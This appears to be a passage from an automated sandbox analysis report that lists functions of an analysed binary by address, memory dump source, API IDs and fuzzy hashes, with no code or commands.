                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 0-1523873471
                                                                                                      • Opcode ID: 7b92824c244248fa0c54466571ceda96fe47a8a71a3eac57a03e6d23568c176a
                                                                                                      • Instruction ID: 41aad8af0c5425743a924ac6e76f24c7fe55bbd94687c73aa3613d0c128e4137
                                                                                                      • Opcode Fuzzy Hash: 7b92824c244248fa0c54466571ceda96fe47a8a71a3eac57a03e6d23568c176a
                                                                                                      • Instruction Fuzzy Hash: A1A14762B1A7C686EB21CF25A4017A97BD1EB54785F048131EFCE87785EE3DE802C710
                                                                                                      Function 00007FF6C78706DC Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 0c5780010ff21e7503fe941d5d2f8ea48bee198d012d5288911bac90ed3c7dfe
                                                                                                      • Instruction ID: 0c89c03f28e749db66b35457536d2f7088af1e6e292a59666385cea5dcf7a800
                                                                                                      • Opcode Fuzzy Hash: 0c5780010ff21e7503fe941d5d2f8ea48bee198d012d5288911bac90ed3c7dfe
                                                                                                      • Instruction Fuzzy Hash: 8DB17D72B0A78585E7688F29C49423D3FA4EB49B49F185136EBCE87399DF39D440C790
                                                                                                      Function 00007FF6C7870A74 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 714b68fe2620ee96a3bd8277b64e6546650eee178ae9d5267a683c2b633430fb
                                                                                                      • Instruction ID: bd2540ad4f77c13441aa8dc79241c8490231391ac2c4d6bb54af8b5aa5239eb6
                                                                                                      • Opcode Fuzzy Hash: 714b68fe2620ee96a3bd8277b64e6546650eee178ae9d5267a683c2b633430fb
                                                                                                      • Instruction Fuzzy Hash: 4DB18F72A0AB8585E7A48F29C09427D3FA4F749B59F244235EBCF87399CF29E441C705
                                                                                                      Function 00007FF6C78821FC Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3806578645-0
                                                                                                      • Opcode ID: ae01cbcd46e19b36510d225b801d78826d1529799777167f2fa8e52c2dc5adf5
                                                                                                      • Instruction ID: adb8f622d29cc600aeff94b3290a4a7dcacf4be9bd767c1b50d1dc42d00247db
                                                                                                      • Opcode Fuzzy Hash: ae01cbcd46e19b36510d225b801d78826d1529799777167f2fa8e52c2dc5adf5
                                                                                                      • Instruction Fuzzy Hash: E541A821B0B64341EB705F26A86177AAEC1AF85B81F048136EFCDC7796DE3CE4018710
                                                                                                      Function 00007FF6C7887C50 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 34511f05812659aca80c40ff535f0d595d486bdab35c799d1182ddd21eab9e16
                                                                                                      • Instruction ID: 63280269d6bc3a27b8ae257e5cc5feae976768d92348ac1dd694a9eec5acea9c
                                                                                                      • Opcode Fuzzy Hash: 34511f05812659aca80c40ff535f0d595d486bdab35c799d1182ddd21eab9e16
                                                                                                      • Instruction Fuzzy Hash: CAB09220E07B06C2EA882F116C8A21826A46F98722F984038C28DA0360DE2C21E95700
                                                                                                      Function 00007FF6C7871590 Relevance: .4, Instructions: 351COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 16955a122a9e005663b3afd89ce6baf410ecafda8987445e36ab57d46c26df13
                                                                                                      • Instruction ID: 105d6b184a422373b8bde3f88dbfddedf78ef8958b6d9c68a4db0b86dedf34b9
                                                                                                      • Opcode Fuzzy Hash: 16955a122a9e005663b3afd89ce6baf410ecafda8987445e36ab57d46c26df13
                                                                                                      • Instruction Fuzzy Hash: 58E1A472F1A60285E7648F28815537D2BA1EB85BD5F188235EB8E87AD9CF39E841C701
                                                                                                      Function 00007FF6C7876220 Relevance: .3, Instructions: 339COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aec7d81a3673badfc3b512a10430379540f1816e81dafed119dde0860a61ae1c
                                                                                                      • Instruction ID: 17a51cfc07ff8e0660dc9602485f80d361528aca65e3c09ee8a83043c49f664b
                                                                                                      • Opcode Fuzzy Hash: aec7d81a3673badfc3b512a10430379540f1816e81dafed119dde0860a61ae1c
                                                                                                      • Instruction Fuzzy Hash: 62C1F872B1A68687DB24CF15A04466ABBA1F794B85F448135EB8F87788DF3DE901CB40
                                                                                                      Function 00007FF6C78719C8 Relevance: .3, Instructions: 327COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9ca0767a17655b13b9f5db8ae47134aea554f7ca8038bb3b92b9f59afb9357b9
                                                                                                      • Instruction ID: 87cb6f5ee75823c88ae1a0b3cdb43623068de30a99989d5eaccc5071c3fcb90c
                                                                                                      • Opcode Fuzzy Hash: 9ca0767a17655b13b9f5db8ae47134aea554f7ca8038bb3b92b9f59afb9357b9
                                                                                                      • Instruction Fuzzy Hash: A2D1C422F0A64286EB688F29844427D6FA0EF85B99F144235EF8F87AD5DF3DD841D740
                                                                                                      Function 00007FF6C78781D8 Relevance: .3, Instructions: 309COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 4023145424-0
                                                                                                      • Opcode ID: ab1a2c5c2f62adfe3e53c833f0d0289fd4dcdd9aa12b4f0d1c5d3d0eaff075e1
                                                                                                      • Instruction ID: 22ade38ca21a18a88dd5081b78c7e2167428e4771952d6b35fcd44edc80597d2
                                                                                                      • Opcode Fuzzy Hash: ab1a2c5c2f62adfe3e53c833f0d0289fd4dcdd9aa12b4f0d1c5d3d0eaff075e1
                                                                                                      • Instruction Fuzzy Hash: 05C1A426B0A68285EB609F6694107BE6BA1FB94B89F804035FFCEC7A95DF3CD545C700
                                                                                                      Function 00007FF6C7886940 Relevance: .3, Instructions: 271COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1500699246-0
                                                                                                      • Opcode ID: a65661641ffaa2a86b6875976da8f6003a378e863b50ef12173faae0db48d599
                                                                                                      • Instruction ID: d057e4c1fd7da55c8177febfa3f990bbf52bfb0705cfe92a8571418307d05b6e
                                                                                                      • Opcode Fuzzy Hash: a65661641ffaa2a86b6875976da8f6003a378e863b50ef12173faae0db48d599
                                                                                                      • Instruction Fuzzy Hash: A1B1E332B1A64682EB649F21D4116B93BA1FB80B9AF008136DB9DC77CADF7CE541C340
                                                                                                      Function 00007FF6C7874D28 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d0da7f92bae012dd11df3e11556849a889c26704c2b4ba3f91171b478ea459a7
                                                                                                      • Instruction ID: 8693a30ee1f9124bc46c274833e1907a7775f467df65df6aea675869a7dbb728
                                                                                                      • Opcode Fuzzy Hash: d0da7f92bae012dd11df3e11556849a889c26704c2b4ba3f91171b478ea459a7
                                                                                                      • Instruction Fuzzy Hash: 88817D32B06A5186EB64CF25D49537D2BA1FB84BA9F544636FFAE87794CF38D0418300
                                                                                                      Function 00007FF6C787DBB4 Relevance: .2, Instructions: 198COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53add2fc6bebfcf2482bc093d0e7072bc3164db2d9e265f531c1659dc61df0a1
                                                                                                      • Instruction ID: fed25c5fa5396f07e0853d6b8e7f6b9d68199c7fcfe78f00ec8eabb1f89a366a
                                                                                                      • Opcode Fuzzy Hash: 53add2fc6bebfcf2482bc093d0e7072bc3164db2d9e265f531c1659dc61df0a1
                                                                                                      • Instruction Fuzzy Hash: 9481D172B0D78186E7A48F19948237AAED0FB957A4F144235EBDE87B95CE3DD4408B10
                                                                                                      Function 00007FF6C788A6CC Relevance: .2, Instructions: 183COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 20e85ab1b5ab952efb93b0779526bdff8a868b32406485d95a7bf1fd94b1e93c
                                                                                                      • Instruction ID: 54494f911bbc7deb403ea5aa9d04ae948f32f974a9a0791151332633c434acd5
                                                                                                      • Opcode Fuzzy Hash: 20e85ab1b5ab952efb93b0779526bdff8a868b32406485d95a7bf1fd94b1e93c
                                                                                                      • Instruction Fuzzy Hash: D661D422F0E78246F7649F2888447796E91BF40762F19423BE7EDC67C5EE6DE8418702
                                                                                                      Function 00007FF6C7890030 Relevance: .2, Instructions: 163COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 051df2aa9320ed464b1265f32a23b335f477f8d91c52c0dd94ff4d204050c252
                                                                                                      • Instruction ID: 185bf9852e21246f559b6a2a3372121b7f7abb67f92e97e5e787ffa125bcb1f2
                                                                                                      • Opcode Fuzzy Hash: 051df2aa9320ed464b1265f32a23b335f477f8d91c52c0dd94ff4d204050c252
                                                                                                      • Instruction Fuzzy Hash: CA51924BD4F5D74AF6E24F280C660682F95EB76A16B4D507BC7C9C72C3ED0F28458212
                                                                                                      Function 00007FF6C786F704 Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                      • Instruction ID: 14a9a3a558a67567f67f155a8aff6ae3f4b153e8e1883744d6a670c22489c954
                                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                      • Instruction Fuzzy Hash: AD515276A3A65196E7248F29C0442383BA0EB49F59F245131DBCDD7795CF3AEA42C780
                                                                                                      Function 00007FF6C786F2F4 Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                      • Instruction ID: 960ca30b73fc7dcb73807be4cafa4e25f3094e6f6876d74dc003d9bd42c04341
                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                      • Instruction Fuzzy Hash: 8D518336A3A65192E7248F29D1446383BA0EB45B69F245131CFCDD77A4CF3AEA43C740
                                                                                                      Function 00007FF6C786FB14 Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                      • Instruction ID: 5f8d48d26f8e43459adc029bd1bed1cecb70f99b3e1927000591d217acc79e4f
                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                      • Instruction Fuzzy Hash: 1F518376A3AA5192E7248F29C0542383BA1EB45B69F248131CFCDC7794CF3AEA53C740
                                                                                                      Function 00007FF6C786F0F0 Relevance: .1, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db363646d287334b7a31293e9082935613ba5dde14aee32d187fc7345eaa1eeb
                                                                                                      • Instruction ID: ad4390cc5a3cc997ac0ce84c19d28c07665405b03ba58cab934ea40ed72dab19
                                                                                                      • Opcode Fuzzy Hash: db363646d287334b7a31293e9082935613ba5dde14aee32d187fc7345eaa1eeb
                                                                                                      • Instruction Fuzzy Hash: B951A176A3A65196E7258F29C0402393BA2EB45F99F244131CB8DD7794CF3AEA43CB40
